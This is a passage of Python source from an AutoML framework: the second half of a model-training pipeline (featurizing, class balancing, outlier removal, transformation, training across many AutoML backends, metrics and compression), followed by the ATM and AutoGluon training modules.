os.chdir(prevdir+'/features/image_features')
default_features=default_image_features
elif problemtype == 'video':
# featurize video
os.chdir(prevdir+'/features/video_features')
default_features=default_video_features
print('-----------------------------------')
print(' FEATURIZING %s'%(classes[i].upper()))
print('-----------------------------------')
os.system('python3 featurize.py "%s"'%(data_dir+'/'+classes[i]))
os.chdir(data_dir+'/'+classes[i])
# load audio features
listdir=os.listdir()
feature_list=list()
label_list=list()
for j in range(len(listdir)):
if listdir[j][-5:]=='.json':
try:
g=json.load(open(listdir[j]))
# consolidate all features into one array (if featurizing with multiple featurizers)
default_feature=list()
default_label=list()
for k in range(len(default_features)):
default_feature=default_feature+g['features'][problemtype][default_features[k]]['features']
default_label=default_label+g['features'][problemtype][default_features[k]]['labels']
feature_list.append(default_feature)
label_list.append(default_label)
except:
print('ERROR - skipping ' + listdir[j])
data[class_type]=feature_list
elif mtype == 'r':
# featurize .CSV
os.chdir(prevdir+'/features/csv_features')
output_file=str(uuid.uuid1())+'.csv'
os.system('python3 featurize_csv_regression.py -i "%s" -o "%s" -t "%s"'%(prevdir+'/train_dir/'+csvfile, prevdir+'/train_dir/'+output_file, classes[0]))
csvfile=output_file
default_features=['csv_regression']
###############################################################
## GENERATE TRAINING DATA ##
###############################################################
print('-----------------------------------')
print(f.renderText('CREATING TRAINING DATA'))
print('-----------------------------------')
# perform class balance such that both classes have the same number
# of members (true by default, but can also be false)
os.chdir(prevdir+'/training/')
model_dir=prevdir+'/models'
balance=settings['balance_data']
remove_outliers=settings['remove_outliers']
outlier_types=settings['default_outlier_detector']
if mtype == 'c':
if problemtype != 'csv':
jsonfile=''
for i in range(len(classes)):
if i==0:
jsonfile=classes[i]
else:
jsonfile=jsonfile+'_'+classes[i]
jsonfile=jsonfile+'.json'
#try:
g=data
alldata=list()
labels=list()
lengths=list()
# check to see all classes are same length and reshape if necessary
for i in range(len(classes)):
class_=g[classes[i]]
lengths.append(len(class_))
lengths=np.array(lengths)
minlength=np.amin(lengths)
# now load all the classes
for i in range(len(classes)):
class_=g[classes[i]]
random.shuffle(class_)
# only balance if specified in settings
if balance==True:
if len(class_) > minlength:
print('%s greater than minlength (%s) by %s, equalizing...'%(classes[i], str(minlength), str(len(class_)-minlength)))
class_=class_[0:minlength]
for j in range(len(class_)):
alldata.append(class_[j])
labels.append(i)
# load features file and get feature labels by loading in classes
labels_dir=prevdir+'/train_dir/'+classes[0]
os.chdir(labels_dir)
listdir=os.listdir()
features_file=''
for i in range(len(listdir)):
if listdir[i].endswith('.json'):
features_file=listdir[i]
labels_=list()
for i in range(len(default_features)):
tlabel=json.load(open(features_file))['features'][problemtype][default_features[i]]['labels']
labels_=labels_+tlabel
elif problemtype == 'csv':
# format data appropriately
jsonfile=target+'.json'
#try:
g=data
alldata=list()
labels=list()
lengths=list()
# check to see all classes are same length and reshape if necessary
for i in range(len(classes)):
class_=g[classes[i]]
lengths.append(len(class_))
lengths=np.array(lengths)
minlength=np.amin(lengths)
# now load all the classes
for i in range(len(classes)):
class_=g[classes[i]]
random.shuffle(class_)
# only balance if specified in settings
if balance==True:
if len(class_) > minlength:
print('%s greater than minlength (%s) by %s, equalizing...'%(classes[i], str(minlength), str(len(class_)-minlength)))
class_=class_[0:minlength]
for j in range(len(class_)):
alldata.append(class_[j])
labels.append(i)
# load features file and get feature labels by loading in classes
labels_=csv_feature_labels
elif mtype == 'r':
regression_data=pd.read_csv(prevdir+'/train_dir/'+csvfile)
print(csvfile)
# get features and labels
features_=regression_data.drop(columns=classes, axis=1)
labels_=list(features_)
labels_csv=regression_data.drop(columns=list(features_), axis=1)
# iterate through each column and make into proper features and labels
features=list()
labels=list()
# testing
# print(len(features_))
# print(len(labels_))
# print(features_)
# print(labels_)
# print(features_.iloc[0,:])
# print(labels_.iloc[0,:])
# get features and labels
for i in range(len(features_)):
features.append(list(features_.iloc[i,:]))
labels.append(list(labels_csv.iloc[i,:]))
# convert to name alldata just to be consistent
alldata=features
# print(alldata[0])
# print(labels[0])
# print(labels_)
os.chdir(model_dir)
# get the split from the settings.json
try:
test_size=settings['test_size']
except:
test_size=0.25
# error checking around lengths of arrays and deleting as necessary
lengths=list()
for i in range(len(alldata)):
lengths.append(len(alldata[i]))
# CLEAN IF DIMENSIONS DO NOT MATCH!!
maxval=max(lengths)
minval=min(lengths)
delete_ind=list()
inds=list()
alldata=np.array(alldata)
labels=np.array(labels)
if maxval != minval:
if lengths.count(maxval) > lengths.count(minval):
for i in range(len(lengths)):
# this means that additional column has been removed
if lengths[i] == minval:
delete_ind.append(i)
elif lengths.count(maxval) < lengths.count(minval):
for i in range(len(lengths)):
# this means that additional column has been added
if lengths[i] == maxval:
delete_ind.append(i)
print('DELETING THESE INDICES: %s'%(str(delete_ind)))
print(alldata.shape)
print(labels.shape)
alldata=np.delete(alldata, tuple(delete_ind), axis=0)
labels=np.delete(labels, tuple(delete_ind))
print(alldata.shape)
print(labels.shape)
# # now see if any element in the array is a NaN and do not include if so in alldata or labels
# for i in range(len(alldata)):
# try:
# array_has_nan = list(np.isnan(np.array(alldata[i]))).count(True)
# array_has_string=list(np.char.isnumeric(np.array(alldata[i]))).count(False)
# except:
# array_has_string=1
# if array_has_nan > 0 or array_has_string > 0:
# inds.append(i)
# print(alldata[i])
# if len(inds) > 0:
# print('DELETING THESE INDICES: %s'%(str(inds)))
# alldata=np.delete(alldata, tuple(inds))
# labels=np.delete(labels, tuple(inds))
# REMOVE OUTLIERS IF SETTING IS TRUE
alldata=np.array(alldata)
labels=np.array(labels)
if remove_outliers==True:
print('-----------------------------------')
print(' REMOVING OUTLIERS')
print('-----------------------------------')
for i in range(len(outlier_types)):
outlier_type=outlier_types[i]
if outlier_type =='isolationforest':
from sklearn.ensemble import IsolationForest
clf = IsolationForest(random_state=0).fit(alldata)
y_pred = clf.predict(alldata)
inlier_ind=list(np.where(y_pred==1))
outlier_ind=list(np.where(y_pred==-1))
y_pred = y_pred.tolist()
print(type(y_pred))
print(type(y_pred[0]))
n_inliers = y_pred.count(1)
n_outliers = y_pred.count(-1)
print(n_inliers)
print(n_outliers)
# shape before
print(alldata.shape)
print(labels.shape)
# delete outliers
alldata=np.delete(alldata, tuple(outlier_ind), axis=0)
labels=np.delete(labels, tuple(outlier_ind))
print(alldata.shape)
print(labels.shape)
elif outlier_type=='zscore':
os.system('pip3 install statsmodels==0.11.1')
from scipy import stats
from statsmodels.formula.api import ols
# https://towardsdatascience.com/ways-to-detect-and-remove-the-outliers-404d16608dba
z = np.abs(stats.zscore(alldata))
# print(z)
threshold = 3
inds=list(set(np.where(z>threshold)[0]))
print(len(inds))
print(tuple(inds))
print(alldata.shape)
print('-->')
alldata = np.delete(alldata, tuple(inds), axis=0)
print(alldata.shape)
labels = np.delete(labels, tuple(inds))
print(len(alldata))
print(len(labels))
# rebalance data to all be the same length
newlabels=list(labels)
outlier_class=list()
for i in range(len(classes)):
outlier_class.append(newlabels.count(i))
lengths=np.array(outlier_class)
minlength=np.amin(outlier_class)
# now load all the classes
for i in range(len(classes)):
# only balance if specified in settings
if balance==True:
count2=newlabels.count(i)
while count2 > minlength:
count2=newlabels.count(i)
print('%s greater than minlength (%s) by %s, equalizing...'%(classes[i], str(minlength), str(count2-minlength)))
ind=list(labels).index(i)
alldata=np.delete(alldata, tuple([ind]), axis=0)
labels=np.delete(labels, tuple([ind]))
newlabels=list(labels)
alldata=list(alldata)
labels=list(labels)
# split the data
X_train, X_test, y_train, y_test = train_test_split(alldata, labels, test_size=test_size)
# convert everything to numpy arrays (for testing later)
X_train=np.array(X_train)
X_test=np.array(X_test)
y_train=np.array(y_train)
y_test=np.array(y_test)
# create list of created csv files
created_csv_files=list()
# create training and testing datasets and save to a .CSV file for archive purposes
# this ensures that all machine learning training methods use the same training data
basefile=common_name
temp_listdir=os.listdir()
if create_csv == True:
try:
print(basefile+'_all.csv'.upper())
if basefile+'_all.csv' not in temp_listdir:
all_data = convert_csv(alldata, labels, labels_, mtype, classes)
all_data.to_csv(basefile+'_all.csv',index=False)
created_csv_files.append(basefile+'_all.csv')
except:
print('error exporting data into excel sheet %s'%(basefile+'_all.csv'))
try:
print(basefile+'_train.csv'.upper())
if basefile+'_train.csv' not in temp_listdir:
train_data= convert_csv(X_train, y_train, labels_, mtype, classes)
train_data.to_csv(basefile+'_train.csv',index=False)
created_csv_files.append(basefile+'_train.csv')
except:
print('error exporting data into excel sheet %s'%(basefile+'_train.csv'))
try:
print(basefile+'_test.csv'.upper())
if basefile+'_test.csv' not in temp_listdir:
test_data= convert_csv(X_test, y_test, labels_, mtype, classes)
test_data.to_csv(basefile+'_test.csv',index=False)
created_csv_files.append(basefile+'_test.csv')
except:
print('error exporting data into excel sheet %s'%(basefile+'_test.csv'))
############################################################
## DATA TRANSFORMATION ##
############################################################
'''
Scale features via scalers, dimensionality reduction techniques,
and feature selection strategies per the settings.json document.
'''
preprocess_dir=prevdir+'/preprocessing'
os.chdir(preprocess_dir)
# get all the important settings for the transformations
scale_features=settings['scale_features']
reduce_dimensions=settings['reduce_dimensions']
select_features=settings['select_features']
default_scalers=settings['default_scaler']
default_reducers=settings['default_dimensionality_reducer']
default_selectors=settings['default_feature_selector']
# get command for terminal
transform_command=''
if problemtype == 'csv' and mtype == 'c':
transform_command=transform_command+' "'+'Class'+'"'
else:
for i in range(len(classes)):
transform_command=transform_command+' "'+classes[i]+'"'
# get filename / create a unique file name
if mtype=='r':
t_filename='r_'+common_name
elif mtype=='c':
t_filename='c_'+common_name
# only add names in if True
if scale_features == True:
for i in range(len(default_scalers)):
t_filename=t_filename+'_'+default_scalers[i]
if reduce_dimensions == True:
for i in range(len(default_reducers)):
t_filename=t_filename+'_'+default_reducers[i]
if select_features == True:
for i in range(len(default_selectors)):
t_filename=t_filename+'_'+default_selectors[i]
transform_file=t_filename+'.pickle'
if scale_features == True or reduce_dimensions == True or select_features == True:
print('----------------------------------')
print(f.renderText('TRANSFORMING DATA'))
print('----------------------------------')
# go to proper transformer directory
try:
os.chdir(problemtype+'_transformer')
except:
os.mkdir(problemtype+'_transformer')
os.chdir(problemtype+'_transformer')
# train transformer if it doesn't already exist
os.system('pip3 install scikit-learn==0.22.2.post1')
if transform_file in os.listdir():
# remove file if in listdir to avoid conflicts with naming
os.remove(transform_file)
print('making transformer...')
alldata=np.asarray(alldata)
labels=np.asarray(labels)
os.chdir(preprocess_dir)
if mtype == 'c':
print('python3 transform.py "%s" "%s" "%s" %s'%(problemtype, 'c', common_name, transform_command))
os.system('python3 transform.py "%s" "%s" "%s" %s'%(problemtype, 'c', common_name, transform_command))
os.chdir(problemtype+'_transformer')
print(transform_file)
transform_model=pickle.load(open(transform_file,'rb'))
alldata=transform_model.transform(np.array(alldata))
elif mtype == 'r':
command='python3 transform.py "%s" "%s" "%s" "%s" "%s" "%s"'%('csv', 'r', classes[0], csvfile, prevdir+'/train_dir/', common_name)
print(command)
os.system(command)
os.chdir(problemtype+'_transformer')
transform_model=pickle.load(open(transform_file,'rb'))
alldata=transform_model.transform(alldata)
os.chdir(preprocess_dir)
os.system('python3 load_transformer.py "%s" "%s"'%(problemtype, transform_file))
# now make new files as .CSV
os.chdir(model_dir)
# split the data
X_train, X_test, y_train, y_test = train_test_split(alldata, labels, test_size=test_size)
# convert to numpy arrays
X_train=np.array(X_train)
X_test=np.array(X_test)
y_train=np.array(y_train)
y_test=np.array(y_test)
# get new labels_ array
labels_=list()
for i in range(len(alldata[0].tolist())):
labels_.append('transformed_feature_%s'%(str(i)))
# now create transformed excel sheets
temp_listdir=os.listdir()
if create_csv == True:
try:
print(basefile+'_all_transformed.csv'.upper())
if basefile+'_all_transformed.csv' not in temp_listdir:
all_data = convert_csv(alldata, labels, labels_, mtype, classes)
all_data.to_csv(basefile+'_all_transformed.csv',index=False)
created_csv_files.append(basefile+'_all_transformed.csv')
except:
print('error exporting data into excel sheet %s'%(basefile+'_all_transformed.csv'))
try:
print(basefile+'_train_transformed.csv'.upper())
if basefile+'_train_transformed.csv' not in temp_listdir:
train_data= convert_csv(X_train, y_train, labels_, mtype, classes)
train_data.to_csv(basefile+'_train_transformed.csv',index=False)
created_csv_files.append(basefile+'_train_transformed.csv')
except:
print('error exporting data into excel sheet %s'%(basefile+'_train_transformed.csv'))
try:
print(basefile+'_test_transformed.csv'.upper())
if basefile+'_test_transformed.csv' not in temp_listdir:
test_data= convert_csv(X_test, y_test, labels_, mtype, classes)
test_data.to_csv(basefile+'_test_transformed.csv',index=False)
created_csv_files.append(basefile+'_test_transformed.csv')
except:
print('error exporting data into excel sheet %s'%(basefile+'_test_transformed.csv'))
else:
# make a transform model == '' so that later during model training this can be skipped
transform_model=''
############################################################
## VISUALIZE DATA ##
############################################################
visualize_data=settings['visualize_data']
visual_dir=prevdir+'/visualize'
model_session=str(uuid.uuid1())
os.chdir(visual_dir)
if visualize_data == True and mtype == 'c':
print('----------------------------------')
print(f.renderText('VISUALIZING DATA'))
print('----------------------------------')
command='python3 visualize.py %s'%(problemtype)
for i in range(len(classes)):
command=command+' "'+classes[i]+'"'
os.system(command)
# restructure the visualization directory
os.chdir(visual_dir+'/visualization_session')
os.mkdir('visualizations')
vizdir=os.getcwd()
# move directories so that visualization is separate from main model directory
shutil.move(vizdir+'/clustering', vizdir+'/visualizations/clustering')
shutil.move(vizdir+'/feature_ranking', vizdir+'/visualizations/feature_ranking')
shutil.move(vizdir+'/model_selection', vizdir+'/visualizations/model_selection')
# go back to main direcotry
os.chdir(visual_dir)
# now copy over the visualization directory to
try:
shutil.copytree(visual_dir+'/visualization_session', model_dir+'/'+model_session)
except:
shutil.rmtree(model_dir+'/'+model_session)
shutil.copytree(visual_dir+'/visualization_session', model_dir+'/'+model_session)
# copy over settings.json
shutil.copy(prevdir+'/settings.json',model_dir+'/%s/settings.json'%(model_session))
else:
# make a model session for next section if it doesn't exist from visualization directory
os.chdir(model_dir)
try:
os.mkdir(model_session)
except:
shutil.rmtree(model_session)
os.mkdir(model_session)
# copy over settings.json
shutil.copy(prevdir+'/settings.json', model_dir+'/%s/settings.json'%(model_session))
############################################################
## TRAIN THE MODEL ##
############################################################
'''
Now we can train the machine learning model via the default_training script.
Note you can specify multiple training scripts and it will consecutively model the
files appropriately.
#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#
# Here is what all the variables below mean:
#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^#
# alldata = list of features in an array for model training
# [[39.0, 112.15384615384616, 70.98195453650514, 248.0, 14.0, 103.0, 143.5546875...],
...
[39.0, 112.15384615384616, 70.98195453650514, 248.0, 14.0, 103.0, 143.5546875,...]]
# labels = list of labels in an array for model training
# ['males','females',...,'males','females']
# mtype = classification or regression problem?
# 'c' --> classification
# 'r' --> regression
# jsonfile = filename of the .JSON document seprating classes
# males_females.json
# problemtype = type of problem selected
# 'audio' --> audio files
# 'image' --> images files
# 'text' --> text files
# 'video' --> video files
# 'csv' --> csv files
# default_featurenames = default feature array(s) to use for modeling
# ['librosa_features']
# settings = overall settings currenty used for model training
# output of the settings.json document
-----
# transform_model = transformer model if applicable
# useful for data transformation as part of the model initialization process (if pickle file)
# uses scikit-learn pipeline
# X_train, X_test, y_train, y_test
# training datasets used in the .CSV documents
# also can use pandas dataframe if applicable (loading in the model dir)
'''
print('----------------------------------')
print(f.renderText('MODELING DATA'))
print('----------------------------------')
# get defaults
default_training_scripts=settings['default_training_script']
model_compress=settings['model_compress']
default_featurenames=''
if problemtype != 'csv' and mtype == 'c':
for i in range(len(default_features)):
if i ==0:
default_featurenames=default_features[i]
else:
default_featurenames=default_featurenames+'_|_'+default_features[i]
else:
default_featurenames='csv_classification'
# just move all created .csv files into model_session directory
os.chdir(model_dir)
os.chdir(model_session)
os.mkdir('data')
for i in range(len(created_csv_files)):
shutil.move(model_dir+'/'+created_csv_files[i], os.getcwd()+'/data/'+created_csv_files[i])
# initialize i (for tqdm) and go through all model training scripts
i=0
for i in tqdm(range(len(default_training_scripts)), desc=default_training_scripts[i]):
try:
model_start_time=time.time()
# go to model directory
os.chdir(model_dir)
# get common name and default training script to select proper model trainer
default_training_script=default_training_scripts[i]
common_name_model=common_name+'_'+default_training_script
model_exists, model_listdir = pursue_modeling(mtype, model_dir, problemtype, default_training_script, common_name_model)
if model_exists == False:
print('----------------------------------')
print(' .... training %s '%(default_training_script.upper()))
print('----------------------------------')
if default_training_script=='adanet':
print('Adanet training is coming soon! Please use a different model setting for now.')
# import train_adanet as ta
# ta.train_adanet(mtype, classes, jsonfile, alldata, labels, feature_labels, problemtype, default_featurenames)
elif default_training_script=='alphapy':
import train_alphapy as talpy
modelname, modeldir, files=talpy.train_alphapy(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='atm':
import train_atm as tatm
modelname, modeldir, files=tatm.train_atm(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='autobazaar':
import train_autobazaar as autobzr
modelname, modeldir, files=autobzr.train_autobazaar(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='autogbt':
import train_autogbt as tautogbt
modelname, modeldir, files=tautogbt.train_autogbt(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='autogluon':
import train_autogluon as tautg
modelname, modeldir, files, test_data=tautg.train_autogluon(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='autokaggle':
import train_autokaggle as autokag
modelname, modeldir, files=autokag.train_autokaggle(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='autokeras':
import train_autokeras as autokeras_
modelname, modeldir, files=autokeras_.train_autokeras(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='automl':
import train_automl as auto_ml
modelname, modeldir, files=auto_ml.train_automl(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='autosklearn':
print('Autosklearn training is unstable! Please use a different model setting for now.')
# import train_autosklearn as taskl
# taskl.train_autosklearn(alldata, labels, mtype, jsonfile, problemtype, default_featurenames)
elif default_training_script=='autopytorch':
import train_autopytorch as autotorch_
modelname, modeldir, files=autotorch_.train_autopytorch(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='btb':
import train_btb as tbtb
modelname, modeldir, files=tbtb.train_btb(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='cvopt':
import train_cvopt as tcvopt
modelname, modeldir, files = tcvopt.train_cvopt(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='devol':
import train_devol as td
modelname, modeldir, files=td.train_devol(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='gama':
import train_gama as tgama
modelname, modeldir, files=tgama.train_gama(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='gentun':
import train_gentun as tgentun
modelname, modeldir, files=tgentun.train_gentun(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='hyperband':
import train_hyperband as thband
modelname, modeldir, files = thband.train_hyperband(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='hypsklearn':
import train_hypsklearn as th
modelname, modeldir, files=th.train_hypsklearn(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='hungabunga':
import train_hungabunga as thung
modelname, modeldir, files=thung.train_hungabunga(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='imbalance':
import train_imbalance as timb
modelname, modeldir, files=timb.train_imbalance(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='keras':
import train_keras as tk
modelname, modeldir, files=tk.train_keras(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='ludwig':
import train_ludwig as tl
modelname, modeldir, files=tl.train_ludwig(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='mlblocks':
import train_mlblocks as mlb
modelname, modeldir, files=mlb.train_mlblocks(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='mlbox':
import train_mlbox as mlbox_
modelname, modeldir, files=mlbox_.train_mlbox(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='neuraxle':
if mtype=='c':
print('Neuraxle does not support classification at this time. Please use a different model training script')
break
else:
import train_neuraxle as tneuraxle
modelname, modeldir, files=tneuraxle.train_neuraxle(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='plda':
print('PLDA training is unstable! Please use a different model setting for now.')
# import train_pLDA as tp
# tp.train_pLDA(alldata,labels)
elif default_training_script=='pytorch':
import train_pytorch as t_pytorch
modelname, modeldir, files = t_pytorch.train_pytorch(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='safe':
import train_safe as tsafe
modelname, modeldir, files=tsafe.train_safe(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
elif default_training_script=='scsr':
import train_scsr as scsr
if mtype == 'c':
modelname, modeldir, files=scsr.train_sc(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,minlength)
elif mtype == 'r':
modelname, modeldir, files=scsr.train_sr(X_train,X_test,y_train,y_test,common_name_model,problemtype,classes,default_featurenames,transform_model,model_dir,settings)
elif default_training_script=='tpot':
import train_TPOT as tt
modelname, modeldir, files=tt.train_TPOT(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session)
############################################################
## CALCULATE METRICS / PLOT ROC CURVE ##
############################################################
if modelname.endswith('.pickle'):
foldername=modelname[0:-7]
elif modelname.endswith('.h5'):
foldername=modelname[0:-3]
else:
foldername=common_name_model
# copy the folder in case there are multiple models being trained
try:
shutil.copytree(model_session, foldername)
except:
shutil.rmtree(foldername)
shutil.copytree(model_session, foldername)
cur_dir2=os.getcwd()
os.chdir(foldername)
os.mkdir('model')
os.chdir('model')
model_dir_temp=os.getcwd()
# dump transform model to the models directory if necessary
if transform_model == '':
transformer_name=''
else:
# dump the tranform model into the current working directory
transformer_name=modelname.split('.')[0]+'_transform.pickle'
tmodel=open(transformer_name,'wb')
pickle.dump(transform_model, tmodel)
tmodel.close()
# move all supplementary files into model folder
for j in range(len(files)):
shutil.move(modeldir+'/'+files[j], model_dir_temp+'/'+files[j])
# load model for getting metrics
if default_training_script not in ['alphapy', 'atm', 'autokeras', 'autopytorch', 'ludwig', 'keras', 'devol']:
loadmodel=open(modelname, 'rb')
clf=pickle.load(loadmodel)
loadmodel.close()
elif default_training_script == 'atm':
from atm import Model
clf=Model.load(modelname)
elif default_training_script == 'autokeras':
import tensorflow as tf
import autokeras as ak
clf = pickle.load(open(modelname, 'rb'))
elif default_training_script=='autopytorch':
import torch
clf=torch.load(modelname)
elif default_training_script == 'ludwig':
from ludwig.api import LudwigModel
clf=LudwigModel.load('ludwig_files/experiment_run/model/')
elif default_training_script in ['devol', 'keras']:
from keras.models import load_model
clf = load_model(modelname)
else:
clf=''
# create test_data variable for anything other than autogluon
if default_training_script != 'autogluon':
test_data=''
# now make main .JSON file for the session summary with metrics
get_metrics(clf, problemtype, mtype, default_training_script, common_name, X_test, y_test, classes, modelname, settings, model_session, transformer_name, created_csv_files, test_data, model_start_time)
# now move to the proper models directory
os.chdir(model_dir)
os.system('python3 create_readme.py "%s"'%(os.getcwd()+'/'+foldername))
try:
os.chdir(problemtype+'_models')
except:
os.mkdir(problemtype+'_models')
os.chdir(problemtype+'_models')
shutil.move(model_dir+'/'+foldername, os.getcwd()+'/'+foldername)
############################################################
## COMPRESS MODELS ##
############################################################
if model_compress == True:
print(f.renderText('COMPRESSING MODEL'))
# now compress the model according to model type
if default_training_script in ['hypsklearn', 'scsr', 'tpot']:
# all .pickle files and can compress via scikit-small-ensemble
from sklearn.externals import joblib
# open up model
loadmodel=open(modelname, 'rb')
model = pickle.load(loadmodel)
loadmodel.close()
# compress - from 0 to 9. Higher value means more compression, but also slower read and write times.
# Using a value of 3 is often a good compromise.
joblib.dump(model, modelname[0:-7]+'_compressed.joblib',compress=3)
# can now load compressed models as such
# thenewmodel=joblib.load(modelname[0:-7]+'_compressed.joblib')
# leads to up to 10x reduction in model size and .72 sec - 0.23 secoon (3-4x faster loading model)
# note may note work in sklearn and python versions are different from saving and loading environments.
elif default_training_script in ['devol', 'keras']:
# can compress with keras_compressor
import logging
from keras.models import load_model
from keras_compressor.compressor import compress
logging.basicConfig(
level=logging.INFO,
)
try:
print('compressing model!!')
model = load_model(modelname)
model = compress(model, 7e-1)
model.save(modelname[0:-3]+'_compressed.h5')
except:
print('error compressing model!!')
else:
# for everything else, we can compress pocketflow models in the future.
print('We cannot currently compress %s models. We are working on this!! \n\n The model will remain uncompressed for now'%(default_training_script))
else:
if mtype == 'r':
print('SKIPPING MODELTYPE - %s already exists in the %s folder: %s'%(common_name_model+'_regression', problemtype+'_models', str(model_listdir)))
elif mtype == 'c':
print('SKIPPING MODELTYPE - %s already exists in the %s folder: %s'%(common_name_model+'_classifier', problemtype+'_models', str(model_listdir)))
############################################################
## PRODUCTIONIZING MODELS ##
############################################################
# TO BE COMPLETED IN THE FUTURE!
except:
print('ERROR - error in modeling session')
```
#### File: allie/training/train_atm.py
```python
import pandas as pd
import os, sys, pickle, json, random, shutil, time
os.system('pip3 install atm==0.2.2')
os.system('pip3 install pandas==0.24.2')
import numpy as np
from atm import ATM
def convert_(X_train, y_train):
feature_list=list()
for i in range(len(X_train[0])):
feature_list.append('feature_'+str(i))
feature_list.append('class')
data=dict()
for i in range(len(X_train)):
for j in range(len(feature_list)-1):
if i > 0:
try:
data[feature_list[j]]=data[feature_list[j]]+[X_train[i][j]]
except:
pass
else:
data[feature_list[j]]=[X_train[i][j]]
print(data)
data['class']=y_train
data=pd.DataFrame(data, columns = list(data))
return data
def train_atm(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session):
# create file names
model_name=common_name_model+'.pickle'
csvname=common_name_model.split('_')[0]
files=list()
# initialize and train classifier
atm = ATM()
# create a temporary directory for all models
curdir=os.getcwd()
try:
os.mkdir('atm_temp')
os.chdir('atm_temp')
except:
shutil.rmtree('atm_temp')
os.mkdir('atm_temp')
os.chdir('atm_temp')
try:
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_train_transformed.csv',os.getcwd()+'/train.csv')
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_test_transformed.csv',os.getcwd()+'/test.csv')
except:
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_train.csv',os.getcwd()+'/train.csv')
shutil.copy(curdir+'/'+model_session+'/data/'+csvname+'_test.csv',os.getcwd()+'/test.csv')
# train models
results = atm.run(train_path='train.csv', class_column='class_')
data_results_=str(results.describe())
bestclassifier=str(results.get_best_classifier())
scores=str(results.get_scores())
# export classifier / transfer to model directory
results.export_best_classifier(model_name, force=True)
shutil.move(os.getcwd()+'/'+model_name, curdir+'/'+model_name)
files.append('atm_temp')
files.append(model_name)
files.append('atm.db')
os.chdir(curdir)
model_dir=os.getcwd()
return model_name, model_dir, files
```
#### File: allie/training/train_autogluon.py
```python
import os
# install dependencies
os.system('pip3 install autogluon==0.0.6')
os.system('pip3 install pillow==7.0.0')
os.system('pip3 install numpy==1.18.4')
from autogluon import TabularPrediction as task
import pandas as pd
import os, sys, pickle, json, random, shutil, time
import numpy as np
def convert_gluon(X_train, y_train):
feature_list=list()
for i in range(len(X_train[0])):
feature_list.append('feature_'+str(i))
feature_list.append('class')
data=dict()
for i in range(len(X_train)):
for j in range(len(feature_list)-1):
if i > 0:
try:
data[feature_list[j]]=data[feature_list[j]]+[X_train[i][j]]
except:
pass
else:
data[feature_list[j]]=[X_train[i][j]]
print(data)
data['class']=y_train
data=pd.DataFrame(data, columns = list(data))
data=task.Dataset(data)
return data
def train_autogluon(X_train,X_test,y_train,y_test,mtype,common_name_model,problemtype,classes,default_featurenames,transform_model,settings,model_session):
# get train and test data
train_data = convert_gluon(X_train, y_train)
test_data = convert_gluon(X_test, y_test)
predictor = task.fit(train_data=train_data, label='class')
# get summary
results = predictor.fit_summary(verbosity=3)
# get model name
files=list()
model_name=common_name_model+'.pickle'
# pickle store classifier
f=open(model_name,'wb')
pickle.dump(predictor, f)
f.close()
# now rename current directory with models (keep this info in a folder)
files.append(model_name)
files.append('AutogluonModels')
files.append('catboost_info')
files.append('dask-worker-space')
# get model_name
model_dir=os.getcwd()
return model_name, model_dir, files, test_data
```
